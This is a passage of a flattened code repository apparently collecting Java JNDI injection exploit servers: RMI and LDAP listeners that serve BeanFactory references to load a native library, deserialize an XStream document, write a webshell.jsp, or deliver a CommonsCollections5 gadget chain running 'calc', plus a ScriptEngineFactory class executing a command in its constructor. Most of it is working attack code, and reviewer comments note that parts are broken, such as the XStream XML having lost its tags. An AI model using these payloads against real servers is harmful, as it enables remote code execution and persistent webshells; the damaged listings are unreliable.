14 | that JNDI injection can abuse to load a malicious dll and run arbitrary code. 15 | Preconditions: 16 | 1. a JNDI injection exists 17 | 2. the attacked server has a usable .dll or .so file under a path the attacker controls 18 | 19 | */ 20 | 21 | /* NOTE(review): this module's META-INF/MANIFEST.MF (shown earlier on this page) declares Main-Class: org.example.TomcatBeanFactoryServer, a class that is not among this module's sources in the tree; java -jar on the built jar would therefore not start this server unless the manifest is corrected. The "a" value is a Windows-style relative path (15 "..\\" segments), so the Linux case mentioned in the header comment is not covered by this file as written. */ public class NativeLibLoaderServer { 22 | public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { 23 | Registry registry = LocateRegistry.createRegistry(1100); 24 | // public IP of the attacking host 25 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 26 | ResourceRef ref = new ResourceRef("com.sun.glass.utils.NativeLibLoader", null, "", "", 27 | true, "org.apache.naming.factory.BeanFactory", null); 28 | ref.add(new StringRefAddr("forceString", "a=loadLibrary")); 29 | // an absolute path cannot be used here; adjust the relative path to the environment 30 | ref.add(new StringRefAddr("a", "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\libcmd")); 31 | 32 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); 33 | registry.bind("dllLoader", 
referenceWrapper); 34 | System.out.println("RMI Server start on 1100"); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /com.thoughtworks.xstream.XStream.fromXML/src/main/java/org/example/XstreamServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.NamingException; 7 | import javax.naming.StringRefAddr; 8 | import java.rmi.AlreadyBoundException; 9 | import java.rmi.RemoteException; 10 | import java.rmi.registry.LocateRegistry; 11 | import java.rmi.registry.Registry; 12 | 13 | /* RMI side of the XStream module: forceString maps "a" onto XStream.fromXML; the pom pins xstream 1.4.6. NOTE(review): the xml string as rendered on this page has lost its element tags (only text nodes such as java.lang.Comparable, calc and start survive), so this listing does not reflect the real source file. AlreadyBoundException is declared twice in the throws clause. Consuming-side mitigation is XStream's type allow-list (allowTypes / addPermission) rather than deserializing arbitrary documents. */ public class XstreamServer { 14 | public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException, AlreadyBoundException { 15 | Registry registry = LocateRegistry.createRegistry(1100); 16 | // public IP of the attacking host 17 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 18 | 19 | ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "", 20 | true, "org.apache.naming.factory.BeanFactory", null); 21 | String xml = "\n"+ 22 | "\n"+ 23 | "java.lang.Comparable\n"+ 24 | "\n"+ 25 | "\n"+ 26 | "\n"+ 27 | "calc\n"+ 28 | "\n"+ 29 | "\n"+ 30 | "start\n"+ 31 | "\n"+ 32 | "\n"+ 33 | "\n"; 34 | ref.add(new StringRefAddr("forceString", "a=fromXML")); 35 | ref.add(new StringRefAddr("a", xml)); 36 | 37 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); 38 | registry.bind("FromXML", referenceWrapper); 39 | System.out.println("RMI Server start on 1100"); 40 | } 41 | } 42 | 
-------------------------------------------------------------------------------- /org.yaml.snakeyaml.Yaml/src/main/java/org/example/File.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import javax.script.ScriptEngine; 4 | import javax.script.ScriptEngineFactory; 5 | import java.io.IOException; 6 | import java.util.List; 7 | 8 | /* The class registered in this module's META-INF/services/javax.script.ScriptEngineFactory. All of its effect is in the no-arg constructor, which runs as soon as a ServiceLoader instantiates the factory; main() repeats the same two statements for standalone testing. The IOException that is created and printed first is a leftover debugging trace with no functional role. Naming the class File shadows java.io.File inside org.example, which may be why IOException is also spelled out fully qualified even though it is imported. Every ScriptEngineFactory method returns null and the list-returning ones use raw List; that violates the interface contract and would break a real engine lookup through this factory, which is irrelevant to the constructor side effect but worth knowing when reading it. */ public class File implements ScriptEngineFactory { 9 | 10 | public File() { 11 | try { 12 | new java.io.IOException().printStackTrace(); 13 | java.lang.Runtime.getRuntime().exec("calc"); 14 | } catch (IOException e) { 15 | e.printStackTrace(); 16 | } 17 | } 18 | public static void main(String[] args) throws IOException { 19 | new java.io.IOException().printStackTrace(); 20 | java.lang.Runtime.getRuntime().exec("calc"); 21 | } 22 | 23 | @Override 24 | public String getEngineName() { 25 | return null; 26 | } 27 | 28 | @Override 29 | public String getEngineVersion() { 30 | return null; 31 | } 32 | 33 | @Override 34 | public List getExtensions() { 35 | return null; 36 | } 37 | 38 | @Override 39 | public List getMimeTypes() { 40 | return null; 41 | } 42 | 43 | @Override 44 | public List getNames() { 45 | return null; 46 | } 47 | 48 | @Override 49 | public String getLanguageName() { 50 | return null; 51 | } 52 | 53 | @Override 54 | public String getLanguageVersion() { 55 | return null; 56 | } 57 | 58 | @Override 59 | public Object getParameter(String key) { 60 | return null; 61 | } 62 | 63 | @Override 64 | public String getMethodCallSyntax(String obj, String m, String... args) { 65 | return null; 66 | } 67 | 68 | @Override 69 | public String getOutputStatement(String toDisplay) { 70 | return null; 71 | } 72 | 73 | @Override 74 | public String getProgram(String... 
statements) { 75 | return null; 76 | } 77 | 78 | @Override 79 | public ScriptEngine getScriptEngine() { 80 | return null; 81 | } 82 | } -------------------------------------------------------------------------------- /org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/UserDataRCE_Server_linux.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 4 | import org.apache.naming.ResourceRef; 5 | 6 | import javax.naming.StringRefAddr; 7 | import java.rmi.registry.LocateRegistry; 8 | import java.rmi.registry.Registry; 9 | 10 | /* Linux variant of the writeFile server; the live body is the same as UserDataRCE_Server_windows above, so the two could be one class. The two commented-out earlier attempts use org.h2.store.fs.FileUtils.createDirectory; no pom on this page declares an H2 dependency, so they would not compile if uncommented in this module. ReferenceWrapper is imported yet constructed by its fully qualified name. */ public class UserDataRCE_Server_linux { 11 | public static void main(String[] args) throws Exception{ 12 | System.out.println("Creating evil RMI registry on port 1100"); 13 | Registry registry = LocateRegistry.createRegistry(1100); 14 | System.setProperty("java.rmi.server.hostname", "127.0.0.1"); 15 | 16 | // ===============================1 create http:/================================== 17 | // ResourceRef ref = new ResourceRef("org.h2.store.fs.FileUtils", null, "", "", 18 | // true, "org.apache.naming.factory.BeanFactory", null); 19 | // ref.add(new StringRefAddr("forceString", "a=createDirectory")); 20 | // ref.add(new StringRefAddr("a", "../http:")); 21 | 22 | // ===============================2 create http:/127.0.0.1:7777.1:8888/============ 23 | // ResourceRef ref = new ResourceRef("org.h2.store.fs.FileUtils", null, "", "", 24 | // true, "org.apache.naming.factory.BeanFactory", null); 25 | // ref.add(new StringRefAddr("forceString", "a=createDirectory")); 26 | // ref.add(new StringRefAddr("a", "../http:/127.0.0.1:8888")); 27 | 28 | // ===============================3 write the webshell file============================= 29 | ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", 30 | true, "org.apache.catalina.users.MemoryUserDatabaseFactory", null); 31 | ref.add(new StringRefAddr("pathname", 
"http://127.0.0.1:7777/../../webapps/ROOT/webshell.jsp")); 32 | ref.add(new StringRefAddr("readonly", "false")); 33 | 34 | ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); 35 | registry.bind("writeFile", referenceWrapper); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /.idea/artifacts/org_yaml_snakeyaml_Yaml_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/org_yaml_snakeyaml_Yaml_jar 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /.idea/artifacts/org_apache_naming_factory_BeanFactory_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/org_apache_naming_factory_BeanFactory_jar 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /ByUnserialize/src/main/java/org/example/UnserializeLDAPServer.java: -------------------------------------------------------------------------------- 1 | package org.example; 2 | 3 | import com.unboundid.ldap.listener.InMemoryDirectoryServer; 4 | import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; 5 | import com.unboundid.ldap.listener.InMemoryListenerConfig; 6 | import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; 7 | import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; 8 | import com.unboundid.ldap.sdk.Entry; 9 | import com.unboundid.ldap.sdk.LDAPResult; 10 | import com.unboundid.ldap.sdk.ResultCode; 11 | import org.apache.commons.collections.Transformer; 12 | import org.apache.commons.collections.functors.ChainedTransformer; 13 | import 
org.apache.commons.collections.functors.ConstantTransformer; 14 | import org.apache.commons.collections.functors.InvokerTransformer; 15 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 16 | import org.apache.commons.collections.map.LazyMap; 17 | 18 | import javax.management.BadAttributeValueExpException; 19 | import javax.net.ServerSocketFactory; 20 | import javax.net.SocketFactory; 21 | import javax.net.ssl.SSLSocketFactory; 22 | import java.io.ByteArrayOutputStream; 23 | import java.io.ObjectOutputStream; 24 | import java.lang.reflect.Field; 25 | import java.net.InetAddress; 26 | import java.net.URL; 27 | import java.util.HashMap; 28 | import java.util.Map; 29 | 30 | 31 | public class UnserializeLDAPServer { 32 | private static final String LDAP_BASE = "dc=example,dc=com"; 33 | 34 | public static void main ( String[] tmp_args ) throws Exception{ 35 | String[] args=new String[]{"http://127.0.0.1:8081/#CC5"}; 36 | int port = 4444; 37 | 38 | InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); 39 | config.setListenerConfigs(new InMemoryListenerConfig( 40 | "listen", //$NON-NLS-1$ 41 | InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ 42 | port, 43 | ServerSocketFactory.getDefault(), 44 | SocketFactory.getDefault(), 45 | (SSLSocketFactory) SSLSocketFactory.getDefault())); 46 | 47 | config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ]))); 48 | InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); 49 | System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ 50 | ds.startListening(); 51 | } 52 | 53 | private static class OperationInterceptor extends InMemoryOperationInterceptor { 54 | 55 | private URL codebase; 56 | 57 | public OperationInterceptor ( URL cb ) { 58 | this.codebase = cb; 59 | } 60 | 61 | @Override 62 | public void processSearchResult ( InMemoryInterceptedSearchResult result ) { 63 | String base = result.getRequest().getBaseDN(); 64 | Entry e = new Entry(base); 
65 | try { 66 | sendResult(result, base, e); 67 | } 68 | catch ( Exception e1 ) { 69 | e1.printStackTrace(); 70 | } 71 | } 72 | 73 | protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception { 74 | URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); 75 | System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); 76 | e.addAttribute("javaClassName", "foo"); 77 | String cbstring = this.codebase.toString(); 78 | int refPos = cbstring.indexOf('#'); 79 | if ( refPos > 0 ) { 80 | cbstring = cbstring.substring(0, refPos); 81 | } 82 | 83 | //CommonsCollections5()可以换成 Base64.decode("cc5链条序列化加base64的内容")java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'calc'|base64 84 | e.addAttribute("javaSerializedData",CommonsCollections5()); 85 | 86 | result.sendSearchEntry(e); 87 | result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); 88 | } 89 | } 90 | 91 | private static byte[] CommonsCollections5() throws Exception{ 92 | Transformer[] transformers=new Transformer[]{ 93 | new ConstantTransformer(Runtime.class), 94 | new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}), 95 | new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}), 96 | new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}) 97 | }; 98 | 99 | ChainedTransformer chainedTransformer=new ChainedTransformer(transformers); 100 | Map map=new HashMap(); 101 | Map lazyMap= LazyMap.decorate(map,chainedTransformer); 102 | TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test"); 103 | BadAttributeValueExpException badAttributeValueExpException=new BadAttributeValueExpException(null); 104 | Field field=badAttributeValueExpException.getClass().getDeclaredField("val"); 105 | field.setAccessible(true); 106 | 
field.set(badAttributeValueExpException,tiedMapEntry); 107 | 108 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 109 | 110 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 111 | objectOutputStream.writeObject(badAttributeValueExpException); 112 | objectOutputStream.close(); 113 | 114 | return byteArrayOutputStream.toByteArray(); 115 | } 116 | } -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | --------------------------------------------------------------------------------